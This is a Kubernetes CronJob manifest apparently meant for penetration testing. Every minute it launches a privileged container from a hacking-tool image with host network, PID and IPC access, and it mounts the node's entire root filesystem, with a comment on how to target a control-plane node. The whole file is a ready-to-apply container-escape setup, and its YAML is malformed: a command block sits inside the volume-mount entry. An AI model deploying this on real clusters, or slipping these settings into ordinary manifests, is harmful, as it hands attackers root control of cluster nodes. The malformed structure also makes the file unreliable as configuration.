apiVersion: batch/v1beta1
kind: CronJob
metadata:
  name: everything-allowed-exec-cronjob
  labels:
    app: pentest
    type: cronjob
spec:
  schedule: "*/1 * * * *"
  concurrencyPolicy: Forbid
  jobTemplate:
    spec:
      template:
        spec:
          hostNetwork: true
          hostPID: true
          hostIPC: true
          containers:
          - name: everything-allowed-exec-cronjob
            image: beserkerbob/hackingcontainerkubernetes:0.2
            securityContext:
              privileged: true
            volumeMounts:
            - mountPath: /host
              name: noderoot
              command:
              [
                "sleep",
                "infinity"
              ]
    
          #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
          volumes:
          - name: noderoot
            hostPath:
              path: /
          restartPolicy: OnFailure
